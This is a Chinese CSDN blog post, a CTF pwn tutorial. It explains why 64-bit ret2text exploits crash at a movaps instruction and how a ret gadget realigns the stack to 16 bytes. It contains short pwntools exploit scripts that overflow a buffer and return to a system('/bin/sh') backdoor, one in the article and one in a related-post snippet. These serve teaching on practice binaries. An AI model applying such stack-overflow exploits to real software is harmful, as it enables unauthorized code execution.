在Pwn中,为什么时长需要栈对齐?

于 2023-12-07 20:00:30 发布
阅读量1k 收藏 22
点赞数 21
分类专栏: Pwn CTF 文章标签: linux 网络安全 python 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/134862329
版权
Pwn 同时被 2 个专栏收录
45 篇文章 3 订阅
订阅专栏
CTF
7 篇文章 0 订阅
订阅专栏

Index

介绍

在 Pwn 的学习中,对于初学者常常会遇到这个问题:
找到了溢出点,并且知道如何溢出,但是不知道为什么自己的Payload并没有成功,Pwntools报错EOF:
在这里插入图片描述
今天趁着有时间,来仔细研究一下为什么会发生这种情况。

知识要点

xmm 寄存器要求内存地址对齐,对齐由内存位数决定,本文中为16字节对齐。

正文

首先我随手拽了一题很简单的ret2text。
FindanotherWay

在这里插入图片描述
可以看到是真的基础的那种。然后我们使用EXP:

from PwnModules import *

binary = './FindanotherWay'
io = process(binary)
#io = remote('node5.anna.nssctf.cn', 28852)
elf = ELF(binary)

Padding = b'A' * (12 + 0x08)

# 0x401230 是本题的backdoor函数。
Payload = Padding + p64(0x401230)

debug(io)
io.sendline(Payload)

io.interactive()

然后就EOF了,为什么呢?
打开GDB,开始逐步调试:
在这里插入图片描述
在还没执行read函数之前是这样的,然后我们调试到下一步。(中间跳过了几步,因为我觉得没啥必要)
在这里插入图片描述
可以看到现在我们的RBX已经被Payload覆盖。
这是即将执行system(‘/bin/sh’)的时候:
在这里插入图片描述
可以看到似乎没有什么异常情况,RDI寄存器的值是/bin/sh,RAX寄存器也为0,而看起来同样的这段就能正确执行
在这里插入图片描述

继续执行,程序会抛出SIGSEGV错误,卡在指令:在这里插入图片描述
在这里插入图片描述
movaps xmmword ptr [rsp + 0x50], xmm0 处。
通过谷歌我们可以得知:
x86 Instruction Set Reference

When the source or destination operand is a memory operand, the operand must be aligned on a 16-byte boundary or a general-protection exception (#GP) is generated.

当操作数或源操作数是内存地址时,内存地址必须为16字节对齐。(不固定,但是这个情况是16字节对齐。)

看看参数部分:[rsp + 0x50], xmm0
在这里插入图片描述
很显然我们的rsp不是16字节对齐的,16字节对齐的意思就是地址末尾以0结束,比如上文中的0x7ffc685c2970,就是以0结尾的。
也就是说,我们需要使我们的RSP地址16字节对齐才能成功执行这段语句:movaps xmmword ptr [rsp + 0x50], xmm0
回过来,我们提到了ret。那么ret的作用是什么呢?
正常函数一般逻辑是这样的:

endbr64
push    rbp
mov     rbp, rsp
lea     rdi, aCongratulation ; "Congratulations , now you find another "...
call    _puts
lea     rdi, aHereIsMyGiftEn ; "Here is my gift , enjoy yourself"
call    _puts
lea     rdi, command    ; "/bin/sh"
mov     eax, 0
call    _system
nop
pop     rbp
retn

返回地址与ret是如何处理的呢?
是这样的:
call和ret的实现逻辑可以大概视为进行了这样的操作(严格来说是错误的,只是实际上实现了差不多的逻辑。):

# call
push rip
jmp addr

# ret
pop rip
jump rip

我们尝试在Payload中加上ret指令。
在这里插入图片描述
可以发现变成了这样,执行了2遍ret。
在这里插入图片描述
并且这个操作不会影响我们的ROP链的执行,因为相当于原地踏步了一次,同时还对齐了RSP地址。
在这里插入图片描述
因此最简单的栈对齐方式就是通过添加一个ret gadget。

Red-Leaves
关注
  • 21
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一道简单的RIP覆盖的pwn(远程的话因为ubuntu18缘故所以需要对齐)
doudoudedi
06-03 2613
记一道BUUCTF简单的RIP覆盖的pwn 这个题目就是单纯的RIP覆盖 直接打开64位IDA 直接就有shell可以直接利用 然后就是算偏移了 直接用gdb-peda的工具算出偏移为23 直接上exp: from pwn import * p=remote('buuoj.cn',6001) system=0x401186 payload='a'*23+p64(system) p.sendl...
Pwn】什么是堆内存对齐
weixin_52553215的博客
03-05 1036
AND ESP 0XFFFFFFF0 主流编译器的编译规则规定 “ 程序访问的地址必须向16字节对齐(被16整除)” ,内存对齐之后可以提高访问效率。 对齐前:三次 对齐后:两次
pwn刷题num24----ret2libc + 平衡
tbsqigongzi的博客
04-26 1143
BUUCTF-PWN-ciscn_2019_c_1 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,有三个选择, 欢迎来到这台加密机 1.加密 2.解密 3.退出 选加密1写入三个aaa,被加密成lll,选解密2,出了一句我认为你能自己解密。。。 ida看一
buuctf DSACTF7月pwn 迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
carol2358的博客
07-27 1568
文章目录actf_2019_babystack actf_2019_babystack 迁移,注意ret对齐对齐的: 对齐的: exp: from pwn import * from LibcSearcher import * local_file = './ACTF_2019_babystack' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-o
[pwn]堆:堆风水与堆排布-babyfengshui
热门推荐
Breeze的博客
12-31 1万+
[pwn]堆:堆风水与堆排布-babyfengshui 所谓堆风水也叫作堆排布,其实说严格了并不是一种漏洞的利用方法,而是一种灵活布置堆块来控制堆布局的方法,在一些一些其他漏洞的利用起到效果。通过一道经典的题目,由清华蓝莲花战队出的babyfengshui来看一下: babyfengshui 查看安全策略 没开PIE,但值得一提的是这是一个32位的程序,32位的堆是4字节对齐的。 查看程序逻辑 ...
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn题目的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
电源技术的电感是PWN DC/DC转换器常用的元件
11-16
电感是PWN DC/DC转换器常用的元件,由于它的电流、电压相位不同,因此理论上损耗为零。电感常被用做储能元件,也常与电容共同在输 人滤波器和输出滤波器上用于平滑电流,故也常称为扼流圈。其特点是流过其上的电流...
第一道pwn栈溢出
小白垃圾笔记2
03-03 879
代码和解题思路来自启明星辰的《ctf安全竞赛入门》,当然还有好多热心的师傅们的指导。
这些天的pwn记录
weixin_59339137的博客
11-19 198
一点pwn的做题记录
2021梦极光CTF Pwn
qq_61793472的博客
11-23 421
pwn
【BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4037
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要对齐,这里填充ret来对齐 from pwn...
PWN基础4:Canary保护
prettyX的博客
07-07 862
Canary保护概述 在函数调用发生时,向帧内压入一个额外的随机DWORD,这个随机数被称为“Canary” 如果使用IDA反汇编的话,您可能会看到IDA会将这个随机数标注为“Security Cookie”,在部分书籍的叙述会用Security Cookie来引用这种随机数 Canary位于EBP之前,系统还将在内存区域存放一个Canary的副本 当发生溢出时,Canary将被首先淹没,之后才是EBP和返回地址 在函数返回之前,系统将执行一个额外的安全验证操作,被称作“Security
pwn|软件安全相关问题学习笔记
柷敔的博客
04-16 1378
软件安全相关问题比较琐碎,很多东西一时间记住了但是之后又忘掉了,因此以此文来荟萃各种零零散散的知识点,以备不虞。
PWN-PRACTICE-BUUCTF-2
P1umH0的博客
07-23 185
PWN-PRACTICE-BUUCTF-2pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1[第五空间2019 决赛]PWN5 pwn1_sctf_2016 main函数执行vuln函数 fgets限制了输入的长度,不足以构成栈溢出 通过将输入的字符"I"替换成"you",增加长度,使满足栈溢出 同时可执行文件存在后门函数get_flag 构造payload,覆盖eip到get_flag即可得到flag from pwn import * #io=process(
PWN基础知识及基础栈溢出手法
山高路远
04-12 3876
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
musl pwn 入门 (1)
CoLin的pwn小屋
01-15 1610
musl pwn 入门(1)——基本知识介绍
pwn 如何查看数据的变化
最新发布
08-09
pwn,要查看数据的变化,可以通过以下几种方法: 1. 使用gdb调试器:使用gdb调试程序时,可以设置断点在关键的地方,例如函数调用之前或之后。当程序停在断点处时,可以使用x命令查看的数据。例如,使用命令" x/20wx $esp "可以查看顶开始的20个字(每个字由4个字节组成)。 2. 使用pwntools库:pwntools是一款用于编写和利用pwn题目的Python库。它提供了可以直接从程序读取和写入内存的函数。通过使用pwntools库,可以编写脚本来自动化数据的读取和分析。 3. 使用ROPgadget工具:ROPgadget是一个用于生成ROP链的工具,它可以分析可执行文件的所有可用gadgets(一系列的指令序列)。使用ROPgadget可以查找和识别有用的gadgets,并生成一个ROP链来完成特定的任务。通过阅读和分析生成的ROP链,可以了解数据的变化情况。 总之,查看数据的变化可通过使用调试器、pwn库和ROPgadget工具来实现。这些方法可以帮助我们更好地了解程序在运行过程上数据的变化情况,从而进行漏洞利用和攻击的相关操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值